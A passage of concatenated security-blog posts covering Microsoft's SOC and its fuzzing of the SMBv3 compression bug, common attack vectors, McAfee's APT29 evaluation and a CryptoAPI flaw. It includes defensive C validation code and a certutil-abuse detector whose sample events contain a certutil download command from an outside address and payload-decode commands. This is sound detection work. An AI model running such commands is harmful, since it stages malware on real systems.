    • Indicators of Compromise (IoCs)—Our analysts record any applicable IoCs such as file hashes, malicious IP addresses, and email attributes into our threat intelligence systems so that our SOC (and all customers) can benefit from these learnings.
    • Unknown or unpatched vulnerabilities—Our analysts can initiate processes to ensure that missing security patches are applied, misconfigurations are corrected, and vendors (including Microsoft) are informed of “zero day” vulnerabilities so that they can create security patches for them.
    • Internal actions such as enabling logging on assets and adding or changing security controls. 

Continuous improvement

So the adversary has now been kicked out of the environment and their current operation poses no further risk. Is this the end? Will they retire and open a cupcake bakery or auto repair shop? Not likely after just one failure, but we can consistently disrupt their successes by increasing the cost of attack and reducing the return, which will deter more and more attacks over time. For now, we must assume that adversaries will try to learn from what happened on this attack and try again with fresh ideas and tools.

Because of this, our analysts also focus on learning from each incident to improve their skills, processes, and tooling. This continuous improvement occurs through many informal and formal processes ranging from formal case reviews to casual conversations where they tell the stories of incidents and interesting observations.

As caseload allows, the investigation team also hunts proactively for adversaries when they are not on shift, which helps them stay sharp and grow their skills.

This closes our virtual shift visit for the investigation team. Join us next time as we shift to our Threat hunting team (a.k.a. Tier 3) and get some hard won advice and lessons learned.

…until then, share and enjoy!

P.S. If you are looking for more information on the SOC and other cybersecurity topics, check out previous entries in the series (Part 1 | Part 2a | Part 2b | Part 3a | Part 3b), Mark’s List, and our new security documentation site. Be sure to bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to Mark on LinkedIn or Twitter.

The post Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2 appeared first on Microsoft Security.

Mitigating vulnerabilities in endpoint network stacks

The skyrocketing demand for tools that enable real-time collaboration, remote desktops for accessing company information, and other services that enable remote work underlines the tremendous importance of building and shipping secure products and services. While this is magnified as organizations are forced to adapt to the new environment created by the global crisis, it’s not a new imperative. Microsoft has been investing heavily in security, and over the years our commitment to building proactive security into products and services has only intensified.

To help deliver on this commitment, we continuously find ways to improve and secure Microsoft products. One aspect of our proactive security work is finding vulnerabilities and fixing them before they can be exploited. Our strategy is to take a holistic approach and drive security throughout the engineering lifecycle. We do this by:

  • Building security early into the design of features.
  • Developing tools and processes that proactively find vulnerabilities in code.
  • Introducing mitigations into Windows that make bugs significantly harder to exploit.
  • Having our world-class penetration testing team test the security boundaries of the product so we can fix issues before they can impact customers.

This proactive work ensures we are continuously making Windows safer and finding as many issues as possible before attackers can take advantage of them. In this blog post we will discuss a recent vulnerability that we proactively found and fixed and provide details on tools and techniques we used, including a new set of tools that we built internally at Microsoft. Our penetration testing team is constantly testing the security boundaries of the product to make it more secure, and we are always developing tools that help them scale and be more effective based on the evolving threat landscape. Our investment in fuzzing is the cornerstone of our work, and we are constantly innovating this tech to keep on breaking new ground.

Proactive security to prevent the next WannaCry

In the past few years, much of our team’s efforts have been focused on uncovering remote network vulnerabilities and preventing events like the WannaCry and NotPetya outbreaks. Some bugs we have recently found and fixed include critical vulnerabilities that could be leveraged to exploit common secure remote communication tools like RDP or create ransomware issues like WannaCry: CVE-2019-1181 and CVE-2019-1182 dubbed “DejaBlue“, CVE-2019-1226 (RCE in RDP Server), CVE-2020-0611 (RCE in RDP Client), and CVE-2019-0787 (RCE in RDP client), among others.

One of the biggest challenges we regularly face in these efforts is the sheer volume of code we analyze. Windows is enormous and continuously evolving: 5.7 million source code files, with more than 3,500 developers doing 1,100 pull requests per day in 440 official branches. This rapid cadence and evolution allows us to add new features as well as proactively drive security into Windows.

Like many security teams, we frequently turn to fuzzing to help us quickly explore and assess large codebases. Innovations we’ve made in our fuzzing technology have made it possible to get deeper coverage than ever before, resulting in the discovery of new bugs, faster. One such vulnerability is the remote code execution (RCE) vulnerability in Microsoft Server Message Block version 3 (SMBv3) tracked as CVE-2020-0796 and fixed on March 12, 2020.

In the following sections, we will share the tools and techniques we used to fuzz SMB, the root cause of the RCE vulnerability, and relevant mitigations to exploitation.

Fully deterministic person-in-the-middle fuzzing

We use a custom deterministic full system emulator tool we call “TKO” to fuzz and introspect Windows components. TKO provides the capability to perform full system emulation and memory snapshotting, as well as other innovations. As a result of its unique design, TKO provides several unique benefits to SMB network fuzzing:

  • The ability to snapshot and fuzz forward from any program state.
  • Efficiently restoring to the initial state for fast iteration.
  • Collecting complete code coverage across all processes.
  • Leveraging greater introspection into the system without too much perturbation.

While all of these actions are possible using other tools, our ability to seamlessly leverage them across both user and kernel mode drastically reduces the spin-up time for targets. To learn more, check out David Weston’s recent BlueHat IL presentation “Keeping Windows secure”, which touches on fuzzing, as well as the TKO tool and infrastructure.

Fuzzing SMB

Given the ubiquity of SMB and the impact demonstrated by SMB bugs in the past, assessing this network transfer protocol has been a priority for our team. While there have been past audits and fuzzers thrown against the SMB codebase, some of which postdate the current SMB version, TKO’s new capabilities and functionalities made it worthwhile to revisit the codebase. Additionally, even though the SMB version number has remained static, the code has not! These factors played into our decision to assess the SMB client/server stack.

After performing an initial audit pass of the code to understand its structure and dataflow, as well as to get a grasp of the size of the protocol’s state space, we had the information we needed to start fuzzing.

We used TKO to set up a fully deterministic feedback-based fuzzer with a combination of generated and mutated SMB protocol traffic. Our goal for generating or mutating across multiple packets was to dig deeper into the protocol’s state machine. Normally this would introduce difficulties in reproducing any issues found; however, our use of emulators made this a non-issue. New generated or mutated inputs that triggered new coverage were saved to the input corpus. Our team had a number of basic mutator libraries for different scenarios, but we needed to implement a generator. Additionally, we enabled some of the traditional Windows heap instrumentation using verifier, turning on page heap for SMB-related drivers.

We began work on the SMBv2 protocol generator and took a network capture of an SMB negotiation with the aim of replaying these packets with mutations against a Windows 10, version 1903 client. We added a mutator with basic mutations (e.g., bit flips, insertions, deletions, etc.) to our fuzzer and kicked off an initial run while we continued to improve and develop further.

Figure 1. TKO fuzzing workflow

A short time later, we came back to some compelling results. Replaying the first crashing input with TKO’s kdnet plugin revealed the following stack trace:

> tkofuzz.exe repro inputs\crash_6a492.txt -- kdnet:conn

Figure 2. Windbg stack trace of crash

We found an access violation in srv2!Smb2CompressionDecompress.

Finding the root cause of the crash

While the stack trace suggested that a vulnerability exists in the decompression routine, it’s the parsing of length counters and offsets from the network that causes the crash. The last packet in the transaction needed to trigger the crash has ‘\xfcSMB’ set as the first bytes in its header, making it a COMPRESSION_TRANSFORM packet.

Figure 3. COMPRESSION_TRANSFORM packet details

The SMBv2 COMPRESSION_TRANSFORM packet starts with a COMPRESSION_TRANSFORM_HEADER, which defines where in the packet the compressed bytes begin and the length of the compressed buffer.

  UCHAR  Protocol[4];        // Contains 0xFC, 'S', 'M', 'B'
  ULONG  OriginalMessageSize;
  USHORT AlgorithmId;
  ULONG  Length;

In the srv2!Srv2DecompressData in the graph below, we can find this COMPRESSION_TRANSFORM_HEADER struct being parsed out of the network packet and used to determine pointers being passed to srv2!SMBCompressionDecompress.

Figure 4. Srv2DecompressData graph

We can see that at 0x7e94, rax points to our network buffer, and the buffer is copied to the stack before the OriginalCompressedSegmentSize and Length are parsed out and added together at 0x7ED7 to determine the size of the resulting decompressed bytes buffer. Overflowing this value causes the decompression to write its results out of the bounds of the destination SrvNet buffer, an out-of-bounds write (OOBW).

Figure 5. Overflow condition

Looking further, we can see that the Length field is parsed into esi at 0x7F04, added to the network buffer pointer, and passed to CompressionDecompress as the source pointer. As Length is never checked against the actual number of received bytes, it can cause decompression to read off the end of the received network buffer. Setting this Length to be greater than the packet length also causes the computed source buffer length passed to SmbCompressionDecompress to underflow at 0x7F18, creating an out-of-bounds read (OOBR) vulnerability. Combining this OOBR vulnerability with the previous OOBW vulnerability creates the necessary conditions to leak addresses and create a complete remote code execution exploit.

Figure 6. Underflow condition
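As an added example (not Microsoft’s code), here is a checked parse of the COMPRESSION_TRANSFORM header that rejects both conditions described above before any size is derived from the fields, beside the unchecked arithmetic that produces the wrap. Field offsets follow the 16-byte MS-SMB2 header, which carries a two-byte Flags field between AlgorithmId and Length that the listing above omits; the function and type names and the sample field values are assumptions, and the packets are constructed, not captured.

```c
/* Added example (not Microsoft's code): checked parsing of the SMB2
 * COMPRESSION_TRANSFORM header, beside the unchecked arithmetic from the post. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Wire layout per MS-SMB2: 16 bytes, little-endian. The listing in the post
 * omits the two-byte Flags field that sits between AlgorithmId and Length. */
#define CT_HEADER_SIZE 16u

typedef enum {
    CT_OK = 0,
    CT_ERR_TOO_SHORT,      /* fewer bytes than a full header */
    CT_ERR_BAD_MAGIC,      /* first bytes are not 0xFC 'S' 'M' 'B' */
    CT_ERR_LENGTH_OOBR,    /* Length exceeds the bytes actually received */
    CT_ERR_SIZE_OVERFLOW   /* OriginalCompressedSegmentSize + Length wraps */
} ct_status;

typedef struct {
    uint32_t original_size;  /* OriginalCompressedSegmentSize */
    uint16_t algorithm_id;
    uint16_t flags;
    uint32_t length;         /* Length: offset of the compressed bytes */
} ct_header;

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t rd16le(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* The two unchecked computations the post walks through, kept only to make
 * the wraparound visible; neither value may be used to size or index a buffer. */
uint32_t unchecked_dest_size(uint32_t original_size, uint32_t length) { return original_size + length; }       /* 32-bit wrap (0x7ED7) */
size_t unchecked_src_len(size_t pkt_len, uint32_t length) { return pkt_len - CT_HEADER_SIZE - length; }      /* size_t underflow (0x7F18) */

/* Hardened parse: every field is checked against the received byte count
 * before any size is derived from it. */
ct_status ct_validate(const uint8_t *pkt, size_t pkt_len, ct_header *out)
{
    static const uint8_t magic[4] = { 0xFC, 'S', 'M', 'B' };
    ct_header h;
    size_t payload;

    if (pkt_len < CT_HEADER_SIZE)
        return CT_ERR_TOO_SHORT;
    if (memcmp(pkt, magic, sizeof magic) != 0)
        return CT_ERR_BAD_MAGIC;

    h.original_size = rd32le(pkt + 4);
    h.algorithm_id  = rd16le(pkt + 8);
    h.flags         = rd16le(pkt + 10);
    h.length        = rd32le(pkt + 12);

    payload = pkt_len - CT_HEADER_SIZE;           /* cannot underflow: checked above */
    if (h.length > payload)                       /* source would run past the packet */
        return CT_ERR_LENGTH_OOBR;
    if (h.original_size > UINT32_MAX - h.length)  /* destination size would wrap */
        return CT_ERR_SIZE_OVERFLOW;

    if (out)
        *out = h;
    return CT_OK;
}

/* Builds a constructed packet (header plus zero-filled payload, not a capture)
 * from the given field values and returns the validator's verdict. */
ct_status ct_check_fields(uint32_t original_size, uint32_t length, size_t payload_len)
{
    uint8_t pkt[CT_HEADER_SIZE + 64] = { 0xFC, 'S', 'M', 'B' };

    if (payload_len > 64)
        payload_len = 64;
    for (int i = 0; i < 4; i++) {                 /* little-endian field writes */
        pkt[4 + i]  = (uint8_t)(original_size >> (8 * i));
        pkt[12 + i] = (uint8_t)(length >> (8 * i));
    }
    pkt[8] = 1;                                   /* AlgorithmId, constructed value */
    return ct_validate(pkt, CT_HEADER_SIZE + payload_len, NULL);
}

int main(void)
{
    printf("benign      : %d\n", ct_check_fields(0x1000, 0, 64));
    printf("oobr        : %d\n", ct_check_fields(0x10, 0x100, 64));
    printf("overflow    : %d\n", ct_check_fields(0xFFFFFFF0u, 0x20, 0x20));
    printf("wrapped dest: 0x%x\n", unchecked_dest_size(0xFFFFFFF0u, 0x20));
    return 0;
}
```

The overflow case passes the Length check (32 bytes of payload, Length 0x20) and is caught only by the addition check, which is why both checks are needed.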

Windows 10 mitigations against remote network vulnerabilities

Our discovery of the SMBv3 vulnerability highlights the importance of revisiting protocol stacks regularly as our tools and techniques continue to improve over time. In addition to the proactive hunting for these types of issues, the investments we made in the last several years to harden Windows 10 through mitigations like address space layout randomization (ASLR), Control Flow Guard (CFG), InitAll, and hypervisor-enforced code integrity (HVCI) hinder trivial exploitation and buy defenders time to patch and protect their networks.

For example, turning vulnerabilities like the ones discovered in SMBv3 into working exploits requires finding writeable kernel pages at reliable addresses, a task that requires heap grooming and corruption, or a separate vulnerability in Windows kernel address space layout randomization (ASLR). Typical heap-based exploits taking advantage of a vulnerability like the one described here would also need to make use of other allocations, but Windows 10 pool hardening helps mitigate this technique. These mitigations work together and have a cumulative effect when combined, increasing the development time and cost of reliable exploitation.

Assuming attackers gain knowledge of our address space, indirect jumps are mitigated by kernel-mode CFG. This forces attackers to either use data-only corruption or bypass Control Flow Guard via stack corruption or yet another bug. If virtualization-based security (VBS) and HVCI are enabled, attackers are further constrained in their ability to map and modify memory permissions.

On Secured-core PCs these mitigations are enabled by default. Secured-core PCs combine virtualization, operating system, and hardware and firmware protection. Along with Microsoft Defender Advanced Threat Protection, Secured-core PCs provide end-to-end protection against advanced threats.

While these mitigations collectively lower the chances of successful exploitation, we continue to deepen our investment in identifying and fixing vulnerabilities before they can get into the hands of adversaries.


The post Mitigating vulnerabilities in endpoint network stacks appeared first on Microsoft Security.

What Are the Main Vectors of Attack in Cybersecurity and How Do They Work?

Today’s dangerous cyber landscape demands that all businesses position themselves ahead of cybercriminals in order to maintain their safety. This always starts with identifying your weaknesses, understanding how your company may become compromised, and implementing the most appropriate prevention and detection methods that will help you achieve cyber resilience. But first, you have to understand what vectors of attack you can encounter that may disrupt your business.

What are vectors of attack?

Vectors of attack (or threat vectors) refer to the pathway that cyber attackers take to infiltrate your organization. In essence, an attack vector is a process or route a malicious hacker uses to reach a target, or in other words, the measures the attacker takes to conduct an attack.

Typically, attack vectors are intentional threats (rather than unintentional), as they do require some planning and analysis.

Various entities may exploit these vectors of attack, ranging from upset former employees to malicious hackers, cyber espionage groups, competitors, and more. Regardless of the person or group involved, they may want to disrupt your business, steal your technology or confidential information, or extort money from your employees. In any event, they will do their utmost to successfully utilize attack vectors and gain access to your systems.

Attack vectors vs. Attack surface

Attack vectors are the methods cybercriminals use to gain unauthorized access to a system, while an attack surface refers to the total number of attack vectors used by an intruder to control or steal data from your network or endpoints.

Attack vector examples in cybersecurity

Below I will briefly discuss the most common examples of vectors of attack that can threaten your organization.

#1. Insider Threats

Insider threat is one of the most common attack vectors. Still, not all types of insider threats are malicious, as naïve employees can sometimes inadvertently expose internal data. However, ill-intentioned individuals working for a company may intentionally disclose confidential information or plant malware, being fueled by various motives and for their own personal gain.

The most recent insider threat statistics reveal alarming issues that need to be considered and addressed by all organizations. For example, insider threats have increased by 47% in the past two years and 70% of organizations are witnessing more frequent insider attacks.

#2. Phishing

Phishing is merely one of many hats that social engineering wears. It involves manipulation tactics adopted by a malicious individual whose ultimate purpose is to trick employees into clicking on suspicious links, opening malware-infected email attachments, or giving away their login credentials.

The most insidious subtype of phishing is spear phishing, where very specific employees are observed in great detail only to be targeted later on by cybercriminals. This phenomenon is also part of the rising threat of Business Email Compromise (BEC), a highly sophisticated practice that can devastate companies of all sizes.

#3. Business partners

Third-party organizations can also become major vectors of attack in cybersecurity.

Some of the biggest security incidents and data breaches have been caused by vendors. Supply chain attacks are a common way for attackers to target a vendor’s customers. This is the reason why organizations large and small together with their business partners must foster a culture where cybersecurity best practices are shared and mutual transparency is demonstrated.

#4. Weak or compromised login credentials

Should your employees’ authentication credentials be too weak or become compromised, they may turn out to be an attacker’s surefire way to gain unauthorized access to your IT systems.

Usernames and passwords are the most popular form of authentication that can easily be abused through phishing, data leaks, and credential-stealing malware, giving intruders free access to your workers’ accounts.

Brute-force attacks (the practice through which attackers submit multiple passwords with the purpose of eventually guessing them) are also a serious vector of attack. In the wake of the novel coronavirus pandemic, Heimdal™ Security’s data has revealed that the number of brute-force attacks has increased exponentially. We have noticed a 5% increase in brute-force attacks after the majority of employees have started working from home.

#5. Ransomware / Malware

Ransomware continues to be a highly lucrative business for cybercriminals. Given its huge profits, it’s no surprise that ransomware has even developed into a “business” model – Ransomware as a Service. This allows it to become easily accessible even to people with rather poor technical skills but determined to profit from vulnerable users.

Unpatched vulnerabilities in your systems can allow ransomware to pass through. The most notorious ransomware attacks to date (such as WannaCry and NotPetya) could have been avoided if systems had been patched on time.

At the same time, the huge palette of other existing types of malware can facilitate the infiltration of malicious hackers inside your organization – think about worms, trojans, rootkits, adware, spyware, file-less malware, bots, and many more.

And do keep in mind that everything I’ve listed above refers to only a few vectors of attack that can affect your business.

How to protect your organization from threat vectors

Protecting your business from different attack vectors will not be difficult with the proper resources in place. Below I’ve included the main aspects you should focus on to reduce the risk of threat vectors and prevent potential future attacks.

#1. Educate your employees

We are strong advocates for continuous security education and we believe cybersecurity awareness training sessions should always be mandatory for your employees. Workers should hone their cybersecurity skills periodically, as prevention is key to keeping your business safe in today’s digital landscape. As long as cybercrime continues to thrive and be profitable, cybersecurity training should be a continuous journey inside your company.

Your workers must be taught to recognize the signs of phishing and BEC, create their passwords based on your internal password policy and avoid the most common password mistakes, identify different types of malware, and report cybersecurity incidents and potential threats. You can also try running phishing simulations to help them identify the tell-tale signs of phishing and avoid falling prey to these attacks.

#2. Apply the Principle of Least Privilege (PoLP)

Limiting your users’ rights to the lowest level possible that still allows them to successfully perform their tasks is the cornerstone of PoLP. This practice closes multiple security holes inside your organization, while it allows you to achieve granular control over the actions performed and eliminate the danger of insider threats.

For instance, Heimdal™ Security’s Thor AdminPrivilege is a powerful Privileged Access Management (PAM) solution that simplifies the burdensome tasks of sysadmins who now have to manually escalate and de-escalate user permissions.


#3. Use the right cybersecurity tools

Sometimes, even the most knowledgeable employees (cybersecurity-wise) may accidentally click on malicious links or open infected email attachments. And in certain instances, cybercriminals are doing a great job masquerading as your employees’ superiors or other authoritative figures and manage to trick them into transferring large amounts of money to their accounts. For this reason, our Heimdal™ Security experts have designed next-gen cybersecurity tools and technologies with very specific vectors of attack in mind, to help organizations avoid multiple attack scenarios.

Prevention, detection, and response are the bedrock of our philosophy. As it would be impossible to discover threats individually, we’ve gone beyond signature-based anti-malware solutions that only pick up known threats. As malware attack vectors are ever-growing in size and sophistication, we look at the Internet’s infrastructure to catch threats that traditional antivirus does not see. We’ve developed a highly sophisticated DNS filtering solution that blocks network communication to Command & Control servers, ransomware, next-gen attacks, and data leakages.

At the same time, since we understand the burden of manual patching, we’ve combined Windows and 3rd party software patch management into a single tool to help you remove the risk of unpatched software and systems, all at once.

Thor Premium Enterprise is our EPDR (Endpoint Prevention, Detection, and Response) solution, which combines DNS filtering, Automated Patch Management, and a next-gen Antivirus within a single interface so that you can have a complete overview of your environment.


To Sum Up

To evade threat vectors, organizations must simultaneously rely on ongoing employee cybersecurity education and the proper tools.

Adopting a DNS-based approach to security, which analyzes and monitors network threats and is successful in detecting unknown malware and emerging threats, is essential. At the same time, eliminating attack vectors related to unpatched software and systems, as well as properly managing admin rights, will help you neutralize cyber threats before they damage your organization.

The post What Are the Main Vectors of Attack in Cybersecurity and How Do They Work? appeared first on Heimdal Security Blog.

MITRE APT29 Evaluation – Importance of Prevention in Endpoint Security

In our recent Racing with Cozy Bear blog, we covered the concept of Time Based Security and highlighted the value protection brings to the defender. This is not to say that blocking an attack removes the threat actor from the equation. Attack-blocking protection slows down the offender, buying the defender valuable time to respond. There are three reasons for this:

  1. Blocking an advance forces the offender to change their approach and try again.
  2. Block-level detections are inherently high fidelity, elevating their priority for defenders.
  3. Defenders can focus on other higher-priority detected events that have not been blocked.

As part of the APT29 evaluation, MITRE did not allow vendors to deploy products in blocking mode so as not to interfere with the test. However, they did allow for the deployment of such technologies in non-blocking mode and for participants to highlight scenarios where products would have blocked.

Block-level detections bolstered McAfee’s performance more than any other vendor.

In future evaluations MITRE has stated that protection results will receive their own categories, but during the APT29 evaluation, MITRE captured block-level detections as footnotes as shown in Figure 1.

Figure 1 – Example of Block footnote

From a defender’s perspective, detections that are more definitive are more actionable and carry increasing value. In keeping with Time Based Security, Host Interrogation has been brought into the following chart, a visual representation of detection types from the evaluation.

Figure 2 – Time-base representation of the value for each detection type

The scope of MITRE’s APT29 evaluation covered 20 major steps across all participating vendors, covering 57 techniques spread across 134 sub-steps. One major step was removed due to emulation challenges, leaving 19 major steps.

The following chart plots the highest-ranking detection from each participant for each step. Each step represents a major attacker milestone as emulated, and an opportunity for the defender to protect, detect, and respond.

Figure 3 – Time-Based Security view of best coverage per major step

Another way to represent this data is to aggregate these top-detection values for each participant. Here a block modifier is applied so that non-blocking detections are fully represented as well.

Table 1 – Block Modifier value assignments
Figure 4 – Aggregate Time-Based Security view

Not only did block-level detections bolster McAfee’s performance more than any other vendor’s, but MVISION Endpoint was the only solution to report block-level detections on several attack steps.

An example of this in action was captured during:

  • Step 11 – Initial Compromise
    • Technique T1140 (Deobfuscate/Decode Files or Information)
      • Sub-step 11.A.10 (Decoded an embedded DLL payload to disk using certutil.exe)

Living off the land binaries (aka LOLBins) are native operating system files that can be (ab)used for more than their original intent. Adversaries use them to bypass security controls because most of these programs are otherwise trusted, and they can be invoked from a macro or from the command line. A popular choice of groups such as APT28, Turla, OilRig, and APT10 is the ‘certutil.exe’ tool. Originally intended to query certificate information or configure Certificate Services, it can also be used to obfuscate/de-obfuscate data (T1140) or to download files (T1105, Remote File Copy).

At the time of this writing, MITRE lists 70 report references for T1140, making it a go-to technique for many offenders. Figures 5 and 6 were captured during the evaluation of this technique.

Figure 5 – JTI rule prevents living off the land attacks using certutil.exe during sub-step 11.A.10
Figure 6 – JTI rule prevents living off the land attacks using certutil.exe during sub-step 11.A.10
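The page shows the blocking rule only as a screenshot, so here is an added example of the detection logic a defender would run over process-creation telemetry to catch the certutil.exe abuse described above. It is not McAfee’s JTI rule or any code from the evaluation: the events are constructed samples in the shape of Sysmon Event ID 1 records, and the severity scoring and rule names are assumptions. It matches on both the image name and the PE OriginalFileName so that a renamed copy of certutil is still caught, treats `-` and `/` switch prefixes and mixed case the same, and leaves legitimate uses such as `-verify` alone.

```python
import re
from pathlib import PureWindowsPath

# certutil.exe switches that turn it into a decoder/encoder (T1140) or a downloader (T1105).
DECODE_SWITCHES = {"decode", "decodehex"}
ENCODE_SWITCHES = {"encode", "encodehex"}
DOWNLOAD_SWITCHES = {"urlcache", "verifyctl"}
# Decoding straight to one of these extensions is the payload-staging pattern of sub-step 11.A.10.
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".ps1", ".vbs", ".js", ".hta", ".bat", ".cmd"}

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# They are illustrative only, not telemetry from the MITRE evaluation.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\Public\payload.txt C:\Users\Public\payload.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.5/a.exe a.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -verify -urlfetch C:\certs\server.cer"},           # legitimate use
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"CertUtil.exe /DECODEHEX C:\Temp\in.txt C:\Temp\out.bin"},    # slash switch, mixed case
    {"Image": r"C:\Users\Public\cu.exe", "OriginalFileName": "CertUtil.exe",        # renamed copy
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"cu.exe -decode C:\Users\Public\stage.txt C:\Users\Public\stage.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c dir"},
]

_SWITCH_RE = re.compile(r"^[-/]([A-Za-z]+)$")


def is_certutil(event):
    """Match on Image *and* OriginalFileName (PE version resource) so a renamed copy is still caught."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    original = event.get("OriginalFileName", "").lower()
    return image == "certutil.exe" or original == "certutil.exe"


def classify(event):
    """Return a finding dict for suspicious certutil usage, or None for benign or non-certutil events."""
    if not is_certutil(event):
        return None
    tokens = event.get("CommandLine", "").split()[1:]   # drop the program name itself
    switches, args = set(), []
    for tok in tokens:
        m = _SWITCH_RE.match(tok)
        if m:
            switches.add(m.group(1).lower())
        else:
            args.append(tok)
    base = {"command": event.get("CommandLine", ""), "parent": event.get("ParentImage", "")}
    if switches & DECODE_SWITCHES:
        # The last positional argument is the output file; decoding to an executable type is the worst case.
        out_ext = PureWindowsPath(args[-1]).suffix.lower() if args else ""
        return {**base, "rule": "certutil_decode", "technique": "T1140",
                "severity": "high" if out_ext in EXEC_EXTENSIONS else "medium"}
    if switches & DOWNLOAD_SWITCHES and any(
            a.lower().startswith(("http://", "https://", "ftp://")) for a in args):
        return {**base, "rule": "certutil_download", "technique": "T1105", "severity": "high"}
    if switches & ENCODE_SWITCHES:
        return {**base, "rule": "certutil_encode", "technique": "T1140", "severity": "medium"}
    return None


def scan(events):
    """Run classify() over a list of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["rule"], finding["technique"], finding["command"])
```

In a real pipeline the same logic would sit in the EDR query language or SIEM rule engine rather than Python; the two details worth carrying over are the OriginalFileName match (a renamed binary defeats an image-path rule) and the decision to score the output extension rather than alert on every certutil launch, since certificate administrators do use the tool legitimately.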


While this coverage was provided by MVISION Endpoint, the underlying technology involved is the same in McAfee Endpoint Security 10.7.

Ultimately, coverage is about time. MITRE’s APT29 evaluation in its own way highlighted McAfee’s Time Based Security protection and McAfee’s distinction in block-level detection. Buying time by throwing a speed bump into the path of a speeding Cozy Bear can be the difference in winning the race for security.

*All data is from: © 2018 – 2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

The post MITRE APT29 Evaluation – Importance of Prevention in Endpoint Security appeared first on McAfee Blogs.

Global Managed Detection and Response: Managing EDR Without the Red Bull

Staying on top of threats 24/7, 365 days a year can overwhelm the best SOC analysts. The need for constant vigilance against cyber threats, on top of security tasks such as installing new tools, running reports and investigations, and then reporting to executives, is becoming unsustainable – just like your supply of energy drinks.

McAfee’s new Global Managed Detection and Response (MDR) service with DXC Technology will provide 24/7 critical alert monitoring, managed threat hunting, advanced investigations, and threat disruption 365 days a year.

An ESG survey reveals the struggles SOCs face in improving their security posture with limited talent and resources:

  • 58% of organizations cite employee skills as a key security effectiveness gap
  • 72% say analytics is more difficult than two years ago
  • 70% report having many manual processes as a limiting factor

Global Managed Detection and Response supports McAfee’s “We put the customer first” mantra, freeing SOC analysts from unnecessary operational burdens and empowering security teams to strategically fight adversaries.

McAfee MVISION EDR and endpoint protection products are at the core of this new MDR service. MVISION EDR is an advanced cloud-delivered EDR solution that leverages McAfee’s massive threat intelligence data to provide visibility and advanced threat detection capabilities. In addition to identifying threats, MVISION EDR provides AI-guided investigation that helps analysts make sense of the alerts and guides the investigation process, automating the time-intensive task of collecting and pinpointing key artifacts that are vital to the incident. With the ability to scale to the size of any enterprise, MVISION EDR is the perfect solution to detect and prevent attacks.

DXC Technology is McAfee’s first partner providing threat hunting, advanced investigation and remediation coordination, and will introduce in the future a complete managed service with 24/7 critical alert monitoring.

DXC Technology has a global presence with the support of 3,500-plus security professionals with deep specializations including SOC analytics, forensic investigation, and threat intelligence.

Combining the global security expertise of DXC Technology with our automated, AI-guided investigations lets SOC analysts focus on resolving the incident rather than losing time sifting through noisy alerts. Inspired by the power of working together, McAfee and DXC Technology are freeing your teams from unnecessary operational burden and empowering them to strategically fight adversaries. This level of outside expertise can improve your security posture while keeping costs in check.

Whether you’re on the floor at RSA or at the W lobby bar, McAfee’s new Global Managed Detection and Response service with DXC Technology can turn your security conversation from how overwhelmed you are, to how much time you’ll have to disengage as well as how much money you’re going to save on Red Bull.

Learn more here.


The post Global Managed Detection and Response: Managing EDR Without the Red Bull appeared first on McAfee Blogs.

McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability

Microsoft made news this week with the widely reported vulnerability known as CVE-2020-0601, which impacts the Windows CryptoAPI. This highly critical vulnerability allows an attacker to fake both signatures and digital certificates. An attacker would use spoofed Elliptic-curve cryptography (ECC) certificates to sign malicious files so they evade detection, or to impersonate specific hostnames and evade browser security alerts, by making the file or connection appear to come from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

The CVE-2020-0601 vulnerability reportedly impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. The Microsoft patch (below) addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 

Since the vulnerability was disclosed, a public proof-of-concept exploit has been posted that lets any malicious party sign executables as a third party. The bug can also be used to intercept and spoof secure web (HTTPS) connections and to fake signatures on files and emails.
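The page says the patch makes CryptoAPI “completely validate” ECC certificates without saying what was missing. The following is an added example, not Microsoft’s or McAfee’s code, that models the publicly documented root cause of CVE-2020-0601: a certificate carrying explicit curve parameters (instead of a named-curve OID) was matched to a cached trusted root by its public key alone, so an attacker could choose any private key and solve for a generator that maps it onto the CA’s public point. The curve arithmetic is a minimal textbook implementation over the public NIST P-256 parameters; the CA private key and the attacker’s chosen key are constructed values, and the `vulnerable_match`/`fixed_match` names are this example’s own.

```python
# NIST P-256 domain parameters (FIPS 186-4); these are public constants.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
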